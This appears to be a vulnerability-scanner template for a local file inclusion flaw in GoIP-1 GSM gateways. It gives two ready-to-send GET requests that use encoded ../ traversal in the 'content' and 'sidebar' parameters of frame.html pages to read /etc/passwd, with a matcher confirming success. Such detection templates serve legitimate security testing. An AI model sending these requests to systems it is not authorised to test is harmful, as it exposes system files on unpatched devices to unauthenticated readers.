25 lines
918 B
YAML
25 lines
918 B
YAML
id: goip-1-lfi
|
|
|
|
info:
|
|
name: GoIP-1 GSM - Local File Inclusion
|
|
author: gy741
|
|
severity: high
|
|
description: Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker
|
|
to read arbitrary files on the affected system.
|
|
reference:
|
|
- https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/
|
|
- http://www.hybertone.com/uploadfile/download/20140304125509964.pdf
|
|
- http://en.dbltek.com/latestfirmwares.html
|
|
tags: gsm,goip,lfi,iot
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
|
- "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
|
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|